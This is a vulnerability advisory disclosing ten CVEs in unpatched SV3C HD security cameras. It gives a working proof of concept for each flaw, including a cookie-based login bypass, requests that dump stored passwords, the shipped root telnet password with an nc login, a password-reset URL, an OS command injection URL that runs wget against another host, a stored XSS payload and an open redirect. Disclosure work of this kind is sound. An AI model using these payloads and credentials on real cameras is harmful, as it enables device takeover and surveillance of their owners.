SV3C L-Series HD Camera – Multiple Vulnerabilities

Product Description

SV3C is a Chinese reseller of home and small business security cameras. The company’s official website is www.sv3c.com. The latest version of the application is V2.3.4.2103-S50-NTD-B20170823B, released on August 23, 2017.

Vulnerabilities List

A total of 10 vulnerabilities were identified within the SV3C Camera:

• Improper Session Management
• Improper Authentication
• Use of Hard-coded Passwords
• Improper Authorization
• OS Command Injection
• Password Exposure
• Stored Cross-site Scripting
• Information Disclosure
• Cleartext Transmission of Sensitive Information
• Open Redirect

These vulnerabilities are described in the following sections.

Affected Versions

Version: V2.3.4.2103-S50-NTD-B20170508B

Version: V2.3.4.2103-S50-NTD-B20170823B

Solution

No fix has been released yet.

VULNERABILITIES

Improper Session Management

The Sv3C HD Camera is affected by an improper session management vulnerability that allows the camera login page to be bypassed. This vulnerability could be used to log in to the application without knowing the username and password set by the administrative user. The vulnerability affects version V2.3.4.2103-S50-NTD-B20170508B.

Vulnerability Details

CVE ID: CVE-2018-12666

Access Vector: Remote

Security Risk: Critical

Vulnerability: CWE-228

CVSS Base Score: 9.8

CVSS Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

The SV3C Camera is vulnerable to improper session management due to a lack of proper session token generation. Users are identified only by the authentication level sent in the cookies. When the cookie was set with the name authLevel and the value 255 as shown below, the application allowed the user administrative access to the web application. 

Cookie: language=en-US; authLevel=255

By setting the authLevel cookie, it is possible to bypass the login page and access all functionality within the application with the privilege level of 255, which is equivalent to an admin.

Improper Authentication

The SV3C HD Camera is affected by an improper authentication vulnerability that allows requests to be made to back-end CGI scripts without a valid session. This vulnerability could be used to read and modify the SV3C Camera configuration. The vulnerability affects all versions.

Vulnerability Details

CVE ID: CVE-2018-12667

Access Vector: Remote

Security Risk: Critical

Vulnerability: CWE-287

CVSS Base Score: 9.8

CVSS Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

The SV3C Camera is vulnerable to improper authentication due to improper access checks. When expected requests were submitted to the application without any session cookies, no checks were performed and the application accepted the request as valid, as shown below:

POST /web/cgi-bin/hi3510/param.cgi HTTP/1.1
Host: 192.168.99.124
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.99.124/web/time...
Content-Type: application/x-www-form-urlencoded
Content-Length: 195
Cookie: 
Connection: close
Upgrade-Insecure-Requests: 1 

cmd=setntp&cururl=http%3A%2F%2F192.168.99.124%2Fweb%2Ftime.html&-ntpserver=time.nist.go&-ntpinterval=2&cmd=setservertime&-timezone=Asia%2FHong_Kong&-dstmode=off&-autoupdate=1&-autoupdatetzonvif=1

Figure 1 - Request without cookies to update time settings

The response to this request is shown below:

HTTP/1.0 200 OK
Content-Type:text/html 

<html><head><title></title>        <META http-equiv="Content-Type" content="text/html; charset=gb2312">        <META http-equiv="Refresh" content="0;URL=http://192.168.99.124/web/time.html"></head><body></body></html>Figure 2 - 200 OK response from the application

Figure 2 - 200 OK response from the application

It is then possible to confirm within the application that the settings have been updated, as shown below:

Figure 3 - Time zone modified in the device configuration

This means that the camera does not do any kind of privilege checking and does not have any proper authentication or authorization checks in place.

Use of Hard-coded Passwords

The SV3C HD Camera is shipped with a root password that can be brute-forced. This password was also found to be documented online via external sources. The password could be used to log in to the exposed telnet service to gain root privileges on the affected devices.

This vulnerability exists on V2.3.4.2103-S50-NTD-B20170508B. The latest version of the software, V2.3.4.2103-S50-NTD-B20170823B, includes a root account with the same password, but the telnet port has been closed.

Vulnerability Details

CVE ID: CVE-2018-12668

Access Vector: Remote

Security Risk: Critical

Vulnerability: CWE-259

CVSS Base Score: 9.8

CVSS Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

The password used as the root login account is easily brute-forced as its complexity is weak. Additionally, the password can be found in publicly disclosed password databases such as RockYou. A successful login is shown below:

$ nc 192.168.99.124 23
?????????????
RT-IPC login: root
root
Password: cat1029

Welcome to SONIX.
root@RT-IPC:~$

Figure 4 - Root login to SV#C HD Camera

The password used, cat1029, is shipped on all SV3C HD Cameras. The credentials root:cat1029 can be used to log in to the exposed telnet service.

Improper Authorization

The SV3C camera is vulnerable to improper authorization due to its lack of enforced vertical and horizonal access controls. An attacker with remote access to the SV3C HD Camera web interface can change passwords set within the camera by sending a change password request to the endpoint. This vulnerability affects all versions.

Vulnerability Details

CVE ID: CVE-2018-12669

Access Vector: Remote

Security Risk: High

Vulnerability: CWE-285

CVSS Base Score: 8.8

CVSS Vector: AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

All accounts set within the SV3C HD Camera web interface can be reset by directly sending an updated password request to the web endpoint, as shown below:

http://192.168.99.124/web/cgi-bin/hi3510/param.cgi?cmd=updateuser&user0=admin:secretpass:255:Admin

Figure 5 - updateuser function called on the web application

The above proof of concept will update the username user0 to admin and the password to secretpass. The privilege level will then be set to 255, the highest privilege possible. This attack can be performed by any user.

OS Command Injection

The SV3C HD Camera does not perform validation checks on user inputs and is vulnerable through the ping function, within the web interface, to OS command injection. This vulnerability can be used to run arbitrary commands on the affected system. The vulnerability affects all versions.

Vulnerability Details

CVE ID: CVE-2018-12670

Access Vector: Remote

Security Risk: Critical

Vulnerability: CWE-78

CVSS Base Score: 9.8

CVSS Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

An attacker could use a crafted URL to inject commands and run them on the system. A proof of concept of this vulnerability is shown below:

http://192.168.99.124/cgi-bin/iptest.cgi?cmd=iptest.cgi&-url=google.com%60%[command]%60&-time=%221525805499982%22

http://192.168.99.124/cgi-bin/iptest.cgi?cmd=iptest.cgi&-url=google.com%60%20wget%20192.168.99.123%60&-time=%221525805499982%22

Figure 6 - Command injection payload

The above command performs the ping test against google.com, then runs the wget command against the IP 192.168.99.123. Other commands can be issued but are limited due to the use of BusyBox on the camera.

Password Exposure

An attacker with remote access to the SV3C HD Camera web interface can disclose information about the camera including all password sets set within the camera. This information can then be used to gain access to the web interface. This vulnerability affects all versions.

Vulnerability Details

CVE ID: CVE-2018-12671

Access Vector: Remote

Security Risk: High

Vulnerability: CWE-200

CVSS Base Score: 7.5

CVSS Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

An attacker with access to the camera could disclose information about the camera and its network by submitting requests to endpoints used within the web application.

The following request can be used to gain access to the set usernames and passwords:

GET /web/cgi-bin/hi3510/param.cgi?cmd=getuser HTTP/1.1
Host: 192.168.99.124
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.99.122/web/user...
Connection: close

Figure 7 - Request that reveals usernames and passwords

The response to the above request is shown below:

HTTP/1.0 200 OK
Content-Type:text/html 
var name0="admin";
var password0="wasdaf";
var authLevel0="255";
var name1="guest";
var password1="guest";
var authLevel1="3";
var name2="wafda";
var password2="secret";
var authLevel2="3";
var name3="";
var password3="";
var authLevel3="3";
var name4="";
var password4="";
var authLevel4="3";
var name5="";
var password5="";
var authLevel5="3";
var name6="";
var password6="";
var authLevel6="3";
var name7="";
var password7="";
var authLevel7="3";
var name8="";
var password8="";
var authLevel8="0";
var name9="";
var password9="";
var authLevel9="0";

Figure 8 - Disclosed usernames and passwords

This request discloses all usernames, passwords, and authentication levels that specify if an account is a user or admin.

Stored Cross-site Scripting

The SV3C HD Camera does not perform proper validation on user-supplied input and is vulnerable to cross-site scripting attacks. If proper authorization was implemented, this vulnerability could be leveraged to perform actions on behalf of another user or the administrator. The vulnerability affects version V2.3.4.2103-S50-NTD-B20170508B, which ships with the camera as default. It is unknown if the latest version is affected.

Vulnerability Details

CVE ID: CVE-2018-12672

Access Vector: Remote

Security Risk: High

Vulnerability: CWE-79

CVSS Base Score: 7.1

CVSS Vector: AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N

An attacker could use a crafted URL to insert a JavaScript payload that could be leveraged to execute scripts within another user’s browser. Below is a proof of concept:

http://192.168.99.124/web/cgi-bin/hi3510/param.cgi?cmd=showosdtime&cururl=http%3A%2F%2F192.168.99.124%2Fweb%2Fosd.html%23&cmd=setosdattr&-region=1&-x=66&-y=32&-ipcname=%253Cscript%2520type%253D%2527text%252Fjavascript%27%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&-encode=&cmd=setservername&-ipcname=asdf&-encode=

Figure 9 - XSS payload

This proof of concept will insert a script into the camera name. When the name is loaded within the web interface (i.e., on the page found at Media > OSD), then the script is executed and an alert box pops up within the user’s browser, as shown below:

Figure 10 - JavaScript payload executed within the browser

A user who loads this page will load the script, which could perform malicious actions against the camera under the logged-in user’s account.

Information Disclosure

An attacker with remote access to the SV3C HD Camera web interface can disclose information about the camera including camera hardware, wireless network, and local area network information. This vulnerability affects all versions.

Vulnerability Details

CVE ID: CVE-2018-12673

Access Vector: Remote

Security Risk: High

Vulnerability: CWE-200

CVSS Base Score: 7.5

CVSS Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

An attacker with access to the camera could disclose information about the camera and its network configuration it is on by submitting requests to endpoints used within the web application.

The following request can be used to gain access to information about the camera:

GET /web/cgi-bin/hi3510/param.cgi?cmd=getserverinfo&-encode HTTP/1.1
Host: 192.168.99.122
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: text/plain, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.99.122/web/vide...
X-Requested-With: XMLHttpRequest
Connection: close

Figure 11 - Request for camera information

The response to the above request is shown below:

HTTP/1.0 200 OK
Content-Type:text/html
var serialNum="VVVIPCNTD171205Z-17480IKDSPbcQQs";
var model="RT_IPC";
var hardVersion="8700-sc2135";
var softVersion="V2.3.4.2103-S50-NTD-B20170508B";
var ipcname="IPCAM";
var startdate="2000-1-1 0:0:0";
var runtimes="0 day, 0:11";
var sdstatus="out";
var sdfreespace="0 ";
var sdtotalspace="0 ";
var builddate="May  8 2017 ";
var productmodel="null";
var vendor="RTJ";
var swver="";
var hwver="";
var mppver="mpp";

Figure 12 - Response returning information about the camera and hardware

The following request can be used to gain information about the wireless network if the camera is Wi-Fi enabled and in use:

GET /cgi-bin/getwifiattr.cgi HTTP/1.1
Host: 192.168.99.124
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.99.124/web/inde...
Connection: close

Figure 13 - Request for wireless network information

The following response is returned:

HTTP/1.0 200 OK
Content-Type:text/plain
var wifissid = "TEST-WIFI";
var wifikeytype = "3";
var wifiwhichkey = "0";
var wifikey="TEST-WIFI";
var wifienable="-1";
var wifimac="";
var wifienable="-1";
var linkstatus="0";
var linkssid="";
var wifimode="";

Figure 14 - Wireless information returned

The following request can be used to gain access to information about the local area network:

GET /cgi-bin/getinetattr.cgi HTTP/1.1
Host: 192.168.99.124
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.99.124/web/netw...
Connection: close

Figure 15 - Request for LAN information

Below is the response to the above request:

HTTP/1.0 200 OK
Content-Type:text/plain

var networktype = "LAN" ;
 var ip = "192.168.99.124" ;
 var netmask = "255.255.255.0" ;
 var gateway = "192.168.99.1" ;
 var macaddress = "C0:99:D9:AC:62:18" ;
 var dhcpflag = "off" ;
 var dnsstat = "1" ;
var fdnsip = "192.168.99.1" ;
var sdnsip = "8.8.8.8" ;

Figure 16 - LAN information returned

These requests can be used to gain additional information about the camera and its environment.

Cleartext Transmission of Sensitive Information

The SV3C HD Camera stores the username and password within the cookies of a session. If an attacker gained access to these session cookies, it would be possible to gain access to the username and password of the logged-in account. This vulnerability affects all versions.

Vulnerability Details

CVE ID: CVE-2018-12674

Access Vector: Remote

Security Risk: Medium

Vulnerability: CWE-319

CVSS Base Score: 5.7

CVSS Vector: AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

The SV3C HD Camera discloses the username and password via the cookies found in the session of the camera. By copying out and decoding the Base64 strings, it is possible to view the username and password of the account, as shown below:

1Cookie: language=en-US; username=YWRtaW4%3D; password=d2FzZGFm; authLevel=255

The above strings, YWRtaW4%3D and d2FzZGFm, are Base64 encoded and can be decoded to the following:

2YWRtaW4= -> admin
d2FzZGFm -> wasdaf

Decoding the strings reveals the username and password of the session in use.

Open Redirect

The SV3C HD Camera does not perform origin checks on URLs that the camera’s web interface redirects a user to. This can be leveraged to send a user to an unexpected endpoint. This vulnerability affects all versions.

Vulnerability Details

CVE ID: CVE-2018-12675

Access Vector: Remote

Security Risk: Medium

Vulnerability: CWE-601

CVSS Base Score: 4.3

CVSS Vector: AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N

A crafted URL can be leveraged to send a user to an unexpected endpoint via a crafted link. The following proof of concept will redirect a user to the Bishop Fox website:

http://192.168.99.124/web/cgi-
bin/hi3510/param.cgi?cmd=setmobilesnapattr&cururl=http%3A%2F%2Fbishopfox.com

Figure 17 - Open redirect payload

This vulnerability can be used along with phishing campaigns and other vulnerabilities to further exploit a user.

Disclosure Timeline

• Initial discovery: 4/16/2018
• Vendor contacted 6/18/2018
• Response from vendor 6/27/2018
• Report sent 7/3/2018
• Vulnerability status requested, no response, 7/22/2018
• Vulnerability status requested, no response, 8/20/2018

Researcher

Jefferino Siqueria, Security Analyst at Bishop Fox